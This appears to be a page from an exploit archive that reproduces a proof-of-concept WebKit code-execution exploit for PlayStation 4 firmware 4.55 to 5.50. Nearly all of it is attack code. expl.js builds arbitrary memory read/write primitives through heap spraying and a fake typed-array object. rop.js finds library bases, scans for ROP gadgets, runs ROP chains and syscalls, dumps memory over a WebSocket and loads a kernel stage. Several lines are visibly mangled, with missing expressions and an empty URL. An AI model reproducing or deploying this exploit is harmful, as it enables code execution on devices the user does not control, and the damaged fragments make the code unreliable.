sony playstation 4 (ps4) 4.55 < 5.50 webkit code execution (poc)

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sony playstation 4 (ps4) 4.55 < 5.50 webkit code execution (poc) Code Code...
<--- index.html ---> <html> <body> <script> window.didload = 0; window.didpost = 0; window.onload = function() { window.didload = 1; if (window.didpost == 1) window.stage2(); } window.postExpl = function() { window.didpost = 1; if (window.didload == 1) window.stage2(); } </script> <script src="./expl.js"></script> <script src="./rop.js"></script> <pre id="console"></pre> </body> </html> <--- /index.html ---> <--- expl.js ---> function makeid() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 8; i++) text += possible.charAt(Math.floor(Math.random() * possible.length)); return text; }; var instancespr = []; for (var i = 0; i < 4096; i++) { instancespr[i] = new Uint32Array(1); instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */ } var _dview; function u2d(low, hi) { if (!_dview) _dview = new DataView(new ArrayBuffer(16)); _dview.setUint32(0, hi); _dview.setUint32(4, low); return _dview.getFloat64(0); } var dgc = function() { for (var i = 0; i < 0x100; i++) { new ArrayBuffer(0x100000); } } function int64(low, hi) { this.low = (low >>> 0); this.hi = (hi >>> 0); this.add32inplace = function(val) { var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0; var new_hi = (this.hi >>> 0); if (new_lo < this.low) { new_hi++; } this.hi = new_hi; this.low = new_lo; } this.add32 = function(val) { var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0; var new_hi = (this.hi >>> 0); if (new_lo < this.low) { new_hi++; } return new int64(new_lo, new_hi); } this.sub32 = function(val) { var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0; var new_hi = (this.hi >>> 0); if (new_lo > (this.low) & 0xFFFFFFFF) { new_hi--; } return new int64(new_lo, new_hi); } this.sub32inplace = function(val) { var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0; var new_hi = (this.hi >>> 0); if (new_lo > (this.low) & 0xFFFFFFFF) { new_hi--; } this.hi = new_hi; this.low = new_lo; } this.and32 = function(val) { var new_lo = this.low & val; var new_hi = this.hi; return new int64(new_lo, new_hi); } this.and64 = function(vallo, valhi) { var new_lo = this.low & vallo; var new_hi = this.hi & valhi; return new int64(new_lo, new_hi); } this.toString = function(val) { val = 16; var lo_str = (this.low >>> 0).toString(val); var hi_str = (this.hi >>> 0).toString(val); if (this.hi == 0) return lo_str; else lo_str = zeroFill(lo_str, 8) return hi_str + lo_str; } this.toPacked = function() { return { hi: this.hi, low: this.low }; } this.setPacked = function(pck) { this.hi = pck.hi; this.low = pck.low; return this; } return this; } function zeroFill(number, width) { width -= number.toString().length; if (width > 0) { return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number; } return number + ""; // always return a string } var nogc = []; var fail = function() { alert.apply(null, arguments); throw "fail"; } // Target JSObject for overlap var tgt = { a: 0, b: 0, c: 0, d: 0 } var y = new ImageData(1, 0x4000) postMessage("", "*", []); // Spray properties to ensure object is fastmalloc()'d and can be found easily later var props = {}; for (var i = 0; (i < (0x4000 / 2));) { props[i++] = { value: 0x42424242 }; props[i++] = { value: tgt }; } var foundLeak = undefined; var foundIndex = 0; var maxCount = 0x100; while (foundLeak == undefined && maxCount > 0) { maxCount--; history.pushState(y, ""); Object.defineProperties({}, props); var leak = new Uint32Array(; for (var i = 0; i < leak.length - 6; i++) { if ( leak[i] == 0x42424242 && leak[i + 0x1] == 0xFFFF0000 && leak[i + 0x2] == 0x00000000 && leak[i + 0x3] == 0x00000000 && leak[i + 0x4] == 0x00000000 && leak[i + 0x5] == 0x00000000 && leak[i + 0x6] == 0x0000000E && leak[i + 0x7] == 0x00000000 && leak[i + 0xA] == 0x00000000 && leak[i + 0xB] == 0x00000000 && leak[i + 0xC] == 0x00000000 && leak[i + 0xD] == 0x00000000 && leak[i + 0xE] == 0x0000000E && leak[i + 0xF] == 0x00000000 ) { foundIndex = i; foundLeak = leak; break; } } } if (!foundLeak) { failed = true fail("Failed to find leak!") } var firstLeak =, foundIndex, foundIndex + 0x40); var leakJSVal = new int64(firstLeak[8], firstLeak[9]); Array.prototype.__defineGetter__(100, () => 1); var f = document.body.appendChild(document.createElement('iframe')); var a = new f.contentWindow.Array(13.37, 13.37); var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37); var master = new Uint32Array(0x1000); var slave = new Uint32Array(0x1000); var leakval_u32 = new Uint32Array(0x1000); var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10]; // Create fake ArrayBufferView tgt.a = u2d(2048, 0x1602300); tgt.b = 0; tgt.c = leakval_helper; tgt.d = 0x1337; var c =, b); document.body.removeChild(f); var hax = c[0]; c[0] = 0; tgt.c = c; hax[2] = 0; hax[3] = 0; Object.defineProperty(Array.prototype, 100, { get: undefined }); tgt.c = leakval_helper; var butterfly = new int64(hax[2], hax[3]); butterfly.low += 0x10; tgt.c = leakval_u32; var lkv_u32_old = new int64(hax[4], hax[5]); hax[4] = butterfly.low; hax[5] = butterfly.hi; // Setup read/write primitive tgt.c = master; hax[4] = leakval_u32[0]; hax[5] = leakval_u32[1]; var addr_to_slavebuf = new int64(master[4], master[5]); tgt.c = leakval_u32; hax[4] = lkv_u32_old.low; hax[5] = lkv_u32_old.hi; tgt.c = 0; hax = 0; var prim = { write8: function(addr, val) { master[4] = addr.low; master[5] = addr.hi; if (val instanceof int64) { slave[0] = val.low; slave[1] = val.hi; } else { slave[0] = val; slave[1] = 0; } master[4] = addr_to_slavebuf.low; master[5] = addr_to_slavebuf.hi; }, write4: function(addr, val) { master[4] = addr.low; master[5] = addr.hi; slave[0] = val; master[4] = addr_to_slavebuf.low; master[5] = addr_to_slavebuf.hi; }, read8: function(addr) { master[4] = addr.low; master[5] = addr.hi; var rtv = new int64(slave[0], slave[1]); master[4] = addr_to_slavebuf.low; master[5] = addr_to_slavebuf.hi; return rtv; }, read4: function(addr) { master[4] = addr.low; master[5] = addr.hi; var rtv = slave[0]; master[4] = addr_to_slavebuf.low; master[5] = addr_to_slavebuf.hi; return rtv; }, leakval: function(jsval) { leakval_helper[0] = jsval; var rtv = this.read8(butterfly); this.write8(butterfly, new int64(0x41414141, 0xffff0000)); return rtv; }, createval: function(jsval) { this.write8(butterfly, jsval); var rt = leakval_helper[0]; this.write8(butterfly, new int64(0x41414141, 0xffff0000)); return rt; } }; window.primitives = prim; if (window.postExpl) window.postExpl(); <--- /expl.js ---> <--- rop.js --> var p; var xhr_sync_log = function(str) { var req = new XMLHttpRequest();'GET', "log?" + str, false); try { req.send(); } catch(e){} } var findModuleBaseXHR = function(addr) { var addr_ = addr.add32(0); // copy addr_.low &= 0xFFFFF000; xhr_sync_log("START: " + addr_); while (1) { var vr = p.read4(addr_.add32(0x110-4)); xhr_sync_log("step" + addr_); addr_.sub32inplace(0x1000); } } var log = function(x) { document.getElementById("console").innerText += x + "\n"; } var print = function(string) { // like log but html document.getElementById("console").innerHTML += string + "\n"; } var dumpModuleXHR = function(moduleBase) { var chunk = new ArrayBuffer(0x1000); var chunk32 = new Uint32Array(chunk); var chunk8 = new Uint8Array(chunk); connection = new WebSocket('ws://'); connection.binaryType = "arraybuffer"; var helo = new Uint32Array(1); helo[0] = 0x41414141; var moduleBase_ = moduleBase.add32(0); connection.onmessage = function() { try { for (var i = 0; i < chunk32.length; i++) { var val = p.read4(moduleBase_); chunk32[i] = val; moduleBase_.add32inplace(4); } connection.send(chunk8); } catch (e) { print(e); } } } var get_jmptgt = function(addr) { var z=p.read4(addr) & 0xFFFF; var y=p.read4(addr.add32(2)); if (z != 0x25ff) return 0; return addr.add32(y+6); } var gadgetmap_wk = { "ep": [0x5B, 0x41, 0x5C, 0x41, 0x5D, 0x41, 0x5E, 0x41, 0x5F, 0x5D, 0xC3], "pop rsi": [0x5E, 0xC3], "pop rdi": [0x5F, 0xC3], "pop rsp": [0x5c, 0xC3], "pop rax": [0x58, 0xC3], "pop rdx": [0x5a, 0xC3], "pop rcx": [0x59, 0xC3], "pop rsp": [0x5c, 0xC3], "pop rbp": [0x5d, 0xC3], "pop r8": [0x47, 0x58, 0xC3], "pop r9": [0x47, 0x59, 0xC3], "infloop": [0xEB, 0xFE, 0xc3], "ret": [0xC3], "mov [rdi], rsi": [0x48, 0x89, 0x37, 0xC3], "mov [rax], rsi": [0x48, 0x89, 0x30, 0xC3], "mov [rdi], rax": [0x48, 0x89, 0x07, 0xC3], "mov rxa, rdi": [0x48, 0x89, 0xF8, 0xC3] }; var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0]; slowpath_jop.reverse(); var gadgets; window.stage2 = function() { try { window.stage2_(); } catch (e) { print(e); } } var gadgetcache = {"ret":60,"ep":173,"pop rbp":182,"pop rax":17781,"mov rax, rdi":23248,"pop r8":100517,"pop rsp":128173,"mov [rdi], rsi":150754,"pop rcx":169041,"pop rdi":239071,"pop rsi":597265,"mov [rdi], rax":782172,"jop":813600,"pop rdx":1092690,"mov [rax], rsi":2484823,"pop r9":21430095,"infloop":22604906}, gadgetoffs = {}; window.stage2_ = function() { p = window.prim; print ("[+] exploit succeeded"); print("webkit exploit result: " + p.leakval(0x41414141)); print ("--- welcome to stage2 ---"); p.leakfunc = function(func) { var fptr_store = p.leakval(func); return (p.read8(fptr_store.add32(0x18))).add32(0x40); } gadgetconn = 0; if (!gadgetcache) gadgetconn = new WebSocket('ws://'); var parseFloatStore = p.leakfunc(parseFloat); var parseFloatPtr = p.read8(parseFloatStore); print("parseFloat at: 0x" + parseFloatPtr); var webKitBase = p.read8(parseFloatStore); window.webKitBase = webKitBase; webKitBase.low &= 0xfffff000; webKitBase.sub32inplace(0x5b7000-0x1C000); print("libwebkit base at: 0x" + webKitBase); var o2wk = function(o) { return webKitBase.add32(o); } gadgets = { "stack_chk_fail": o2wk(0xc8), "memset": o2wk(0x228), "setjmp": o2wk(0x14f8) }; /* var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets.memset)); libSceLibcInternalBase.low &= ~0x3FFF; libSceLibcInternalBase.sub32inplace(0x20000); print("libSceLibcInternal: 0x" + libSceLibcInternalBase.toString()); window.libSceLibcInternalBase = libSceLibcInternalBase; */ var libKernelBase = p.read8(get_jmptgt(gadgets.stack_chk_fail)); window.libKernelBase = libKernelBase; libKernelBase.low &= 0xfffff000; libKernelBase.sub32inplace(0x12000); print("libkernel_web base at: 0x" + libKernelBase); var o2lk = function(o) { return libKernelBase.add32(o); } window.o2lk = o2lk; var wkview = new Uint8Array(0x1000); var wkstr = p.leakval(wkview).add32(0x10); var orig_wkview_buf = p.read8(wkstr); p.write8(wkstr, webKitBase); p.write4(wkstr.add32(8), 0x367c000); var gadgets_to_find = 0; var gadgetnames = []; for (var gadgetname in gadgetmap_wk) { if (gadgetmap_wk.hasOwnProperty(gadgetname)) { gadgets_to_find++; gadgetnames.push(gadgetname); gadgetmap_wk[gadgetname].reverse(); } } log("finding gadgets"); gadgets_to_find++; // slowpath_jop var findgadget = function(donecb) { if (gadgetcache) { gadgets_to_find=0; slowpath_jop=0; log("using cached gadgets"); for (var gadgetname in gadgetcache) { if (gadgetcache.hasOwnProperty(gadgetname)) { gadgets[gadgetname] = o2wk(gadgetcache[gadgetname]); } } } else { for (var i=0; i < wkview.length; i++) { if (wkview[i] == 0xc3) { for (var nl=0; nl < gadgetnames.length; nl++) { var found = 1; if (!gadgetnames[nl]) continue; var gadgetbytes = gadgetmap_wk[gadgetnames[nl]]; for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) { if (gadgetbytes[compareidx] != wkview[i - compareidx]){ found = 0; break; } } if (!found) continue; gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1); gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1; delete gadgetnames[nl]; gadgets_to_find--; } } else if (wkview[i] == 0xe0 && wkview[i-1] == 0xff && slowpath_jop) { var found = 1; for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) { if (slowpath_jop[compareidx] != wkview[i - compareidx]) { found = 0; break; } } if (!found) continue; gadgets["jop"] = o2wk(i - slowpath_jop.length + 1); gadgetoffs["jop"] = i - slowpath_jop.length + 1; gadgets_to_find--; slowpath_jop = 0; } if (!gadgets_to_find) break; } } if (!gadgets_to_find && !slowpath_jop) { log("found gadgets"); if (gadgetconn) gadgetconn.onopen = function(e){ gadgetconn.send(JSON.stringify(gadgetoffs)); } setTimeout(donecb, 50); } else { log("missing gadgets: "); for (var nl in gadgetnames) { log(" - " + gadgetnames[nl]); } if(slowpath_jop) log(" - jop gadget"); } } findgadget(function(){}); var hold1; var hold2; var holdz; var holdz1; while (1) { hold1 = {a:0, b:0, c:0, d:0}; hold2 = {a:0, b:0, c:0, d:0}; holdz1 = p.leakval(hold2); holdz = p.leakval(hold1); if (holdz.low - 0x30 == holdz1.low) break; } var pushframe = []; pushframe.length = 0x80; var funcbuf; var launch_chain = function(chain) { var stackPointer = 0; var stackCookie = 0; var orig_reenter_rip = 0; var reenter_help = {length: {valueOf: function(){ orig_reenter_rip = p.read8(stackPointer); stackCookie = p.read8(stackPointer.add32(8)); var returnToFrame = stackPointer; var ocnt = chain.count; chain.push_write8(stackPointer, orig_reenter_rip); chain.push_write8(stackPointer.add32(8), stackCookie); if (chain.runtime) returnToFrame=chain.runtime(stackPointer); chain.push(gadgets["pop rsp"]); // pop rsp chain.push(returnToFrame); // -> back to the trap life chain.count = ocnt; p.write8(stackPointer, (gadgets["pop rsp"])); // pop rsp p.write8(stackPointer.add32(8), chain.ropframeptr); // -> rop frame }}}; var funcbuf32 = new Uint32Array(0x100); nogc.push(funcbuf32); funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10)); p.write8(funcbuf.add32(0x30), gadgets["setjmp"]); p.write8(funcbuf.add32(0x80), gadgets["jop"]); p.write8(funcbuf,funcbuf); p.write8(parseFloatStore, gadgets["jop"]); var orig_hold = p.read8(holdz1); var orig_hold48 = p.read8(holdz1.add32(0x48)); p.write8(holdz1, funcbuf.add32(0x50)); p.write8(holdz1.add32(0x48), funcbuf); parseFloat(hold2,hold2,hold2,hold2,hold2,hold2); p.write8(holdz1, orig_hold); p.write8(holdz1.add32(0x48), orig_hold48); stackPointer = p.read8(funcbuf.add32(0x10)); rtv=Array.prototype.splice.apply(reenter_help); return p.leakval(rtv); } gadgets = gadgets; p.loadchain = launch_chain; window.RopChain = function () { this.ropframe = new Uint32Array(0x10000); this.ropframeptr = p.read8(p.leakval(this.ropframe).add32(0x10)); this.count = 0; this.clear = function() { this.count = 0; this.runtime = undefined; for (var i = 0; i < 0x1000/8; i++) { p.write8(this.ropframeptr.add32(i*8), 0); } }; this.pushSymbolic = function() { this.count++; return this.count-1; } this.finalizeSymbolic = function(idx, val) { p.write8(this.ropframeptr.add32(idx*8), val); } this.push = function(val) { this.finalizeSymbolic(this.pushSymbolic(), val); } this.push_write8 = function(where, what) { this.push(gadgets["pop rdi"]); // pop rdi this.push(where); // where this.push(gadgets["pop rsi"]); // pop rsi this.push(what); // what this.push(gadgets["mov [rdi], rsi"]); // perform write } this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9) { this.push(gadgets["pop rdi"]); // pop rdi this.push(rdi); // what this.push(gadgets["pop rsi"]); // pop rsi this.push(rsi); // what this.push(gadgets["pop rdx"]); // pop rdx this.push(rdx); // what this.push(gadgets["pop rcx"]); // pop r10 this.push(rcx); // what this.push(gadgets["pop r8"]); // pop r8 this.push(r8); // what this.push(gadgets["pop r9"]); // pop r9 this.push(r9); // what this.push(rip); // jmp return this; } = function() { var retv = p.loadchain(this, this.notimes); this.clear(); return retv; } return this; }; var RopChain = window.RopChain(); window.syscallnames = {"exit": 1,"fork": 2,"read": 3,"write": 4,"open": 5,"close": 6,"wait4": 7,"unlink": 10,"chdir": 12,"chmod": 15,"getpid": 20,"setuid": 23,"getuid": 24,"geteuid": 25,"recvmsg": 27,"sendmsg": 28,"recvfrom": 29,"accept": 30,"getpeername": 31,"getsockname": 32,"access": 33,"chflags": 34,"fchflags": 35,"sync": 36,"kill": 37,"getppid": 39,"dup": 41,"pipe": 42,"getegid": 43,"profil": 44,"getgid": 47,"getlogin": 49,"setlogin": 50,"sigaltstack": 53,"ioctl": 54,"reboot": 55,"revoke": 56,"execve": 59,"execve": 59,"msync": 65,"munmap": 73,"mprotect": 74,"madvise": 75,"mincore": 78,"getgroups": 79,"setgroups": 80,"setitimer": 83,"getitimer": 86,"getdtablesize": 89,"dup2": 90,"fcntl": 92,"select": 93,"fsync": 95,"setpriority": 96,"socket": 97,"connect": 98,"accept": 99,"getpriority": 100,"send": 101,"recv": 102,"bind": 104,"setsockopt": 105,"listen": 106,"recvmsg": 113,"sendmsg": 114,"gettimeofday": 116,"getrusage": 117,"getsockopt": 118,"readv": 120,"writev": 121,"settimeofday": 122,"fchmod": 124,"recvfrom": 125,"setreuid": 126,"setregid": 127,"rename": 128,"flock": 131,"sendto": 133,"shutdown": 134,"socketpair": 135,"mkdir": 136,"rmdir": 137,"utimes": 138,"adjtime": 140,"getpeername": 141,"setsid": 147,"sysarch": 165,"setegid": 182,"seteuid": 183,"stat": 188,"fstat": 189,"lstat": 190,"pathconf": 191,"fpathconf": 192,"getrlimit": 194,"setrlimit": 195,"getdirentries": 196,"__sysctl": 202,"mlock": 203,"munlock": 204,"futimes": 206,"poll": 209,"clock_gettime": 232,"clock_settime": 233,"clock_getres": 234,"ktimer_create": 235,"ktimer_delete": 236,"ktimer_settime": 237,"ktimer_gettime": 238,"ktimer_getoverrun": 239,"nanosleep": 240,"rfork": 251,"issetugid": 253,"getdents": 272,"preadv": 289,"pwritev": 290,"getsid": 310,"aio_suspend": 315,"mlockall": 324,"munlockall": 325,"sched_setparam": 327,"sched_getparam": 328,"sched_setscheduler": 329,"sched_getscheduler": 330,"sched_yield": 331,"sched_get_priority_max": 332,"sched_get_priority_min": 333,"sched_rr_get_interval": 334,"sigprocmask": 340,"sigprocmask": 340,"sigsuspend": 341,"sigpending": 343,"sigtimedwait": 345,"sigwaitinfo": 346,"kqueue": 362,"kevent": 363,"uuidgen": 392,"sendfile": 393,"fstatfs": 397,"ksem_close": 400,"ksem_post": 401,"ksem_wait": 402,"ksem_trywait": 403,"ksem_init": 404,"ksem_open": 405,"ksem_unlink": 406,"ksem_getvalue": 407,"ksem_destroy": 408,"sigaction": 416,"sigreturn": 417,"getcontext": 421,"setcontext": 422,"swapcontext": 423,"sigwait": 429,"thr_create": 430,"thr_exit": 431,"thr_self": 432,"thr_kill": 433,"ksem_timedwait": 441,"thr_suspend": 442,"thr_wake": 443,"kldunloadf": 444,"_umtx_op": 454,"_umtx_op": 454,"thr_new": 455,"sigqueue": 456,"thr_set_name": 464,"rtprio_thread": 466,"pread": 475,"pwrite": 476,"mmap": 477,"lseek": 478,"truncate": 479,"ftruncate": 480,"thr_kill2": 481,"shm_open": 482,"shm_unlink": 483,"cpuset_getid": 486,"cpuset_getaffinity": 487,"cpuset_setaffinity": 488,"openat": 499,"pselect": 522,"wait6": 532,"cap_rights_limit": 533,"cap_ioctls_limit": 534,"cap_ioctls_get": 535,"cap_fcntls_limit": 536,"bindat": 538,"connectat": 539,"chflagsat": 540,"accept4": 541,"pipe2": 542,"aio_mlock": 543,"procctl": 544,"ppoll": 545,"futimens": 546,"utimensat": 547,"numa_getaffinity": 548,"numa_setaffinity": 549} function swapkeyval(json){ var ret = {}; for(var key in json){ if (json.hasOwnProperty(key)) { ret[json[key]] = key; } } return ret; } window.nameforsyscall = swapkeyval(window.syscallnames); window.syscalls = {}; log("--- welcome to stage3 ---"); var kview = new Uint8Array(0x1000); var kstr = p.leakval(kview).add32(0x10); var orig_kview_buf = p.read8(kstr); p.write8(kstr, window.libKernelBase); p.write4(kstr.add32(8), 0x40000); // high enough lel var countbytes; for (var i=0; i < 0x40000; i++) { if (kview[i] == 0x72 && kview[i+1] == 0x64 && kview[i+2] == 0x6c && kview[i+3] == 0x6f && kview[i+4] == 0x63) { countbytes = i; break; } } p.write4(kstr.add32(8), countbytes + 32); var dview32 = new Uint32Array(1); var dview8 = new Uint8Array(dview32.buffer); for (var i=0; i < countbytes; i++) { if (kview[i] == 0x48 && kview[i+1] == 0xc7 && kview[i+2] == 0xc0 && kview[i+7] == 0x49 && kview[i+8] == 0x89 && kview[i+9] == 0xca && kview[i+10] == 0x0f && kview[i+11] == 0x05) { dview8[0] = kview[i+3]; dview8[1] = kview[i+4]; dview8[2] = kview[i+5]; dview8[3] = kview[i+6]; var syscallno = dview32[0]; window.syscalls[syscallno] = window.libKernelBase.add32(i); } } var chain = new window.RopChain; var returnvalue; p.fcall_ = function(rip, rdi, rsi, rdx, rcx, r8, r9) { chain.clear(); chain.notimes = this.next_notime; this.next_notime = 1; chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9); chain.push(window.gadgets["pop rdi"]); // pop rdi chain.push(chain.ropframeptr.add32(0x3ff8)); // where chain.push(window.gadgets["mov [rdi], rax"]); // rdi = rax chain.push(window.gadgets["pop rax"]); // pop rax chain.push(p.leakval(0x41414242)); // where if ( != 0x41414242) throw new Error("unexpected rop behaviour"); returnvalue = p.read8(chain.ropframeptr.add32(0x3ff8)); //p.read8(chain.ropframeptr.add32(0x3ff8)); } p.fcall = function() { var rv=p.fcall_.apply(this,arguments); return returnvalue; } p.readstr = function(addr){ var addr_ = addr.add32(0); // copy var rd = p.read4(addr_); var buf = ""; while (rd & 0xFF) { buf += String.fromCharCode(rd & 0xFF); addr_.add32inplace(1); rd = p.read4(addr_); } return buf; } p.syscall = function(sysc, rdi, rsi, rdx, rcx, r8, r9) { if (typeof sysc == "string") { sysc = window.syscallnames[sysc]; } if (typeof sysc != "number") { throw new Error("invalid syscall"); } var off = window.syscalls[sysc]; if (off == undefined) { throw new Error("invalid syscall"); } return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9); } p.sptr = function(str) { var bufView = new Uint8Array(str.length+1); for (var i=0; i<str.length; i++) { bufView[i] = str.charCodeAt(i) & 0xFF; } window.nogc.push(bufView); return p.read8(p.leakval(bufView).add32(0x10)); }; log("loaded sycalls"); var rtv1 = p.fcall(window.gadgets["mov rax, rdi"], 0x41414141); var pid = p.syscall("getpid"); var uid = p.syscall("getuid"); print("all good. fcall test retval = " + rtv1 + " - uid: " + uid + " - pid: " + pid); sc = document.createElement("script"); sc.src="kern.js"; document.body.appendChild(sc); } <--- /rop.js -->

Sony playstation 4 (ps4) 4.55 < 5.50 webkit code execution (poc) Vulnerability / Exploit Source : Sony playstation 4 (ps4) 4.55 < 5.50 webkit code execution (poc)

Last Vulnerability or Exploits


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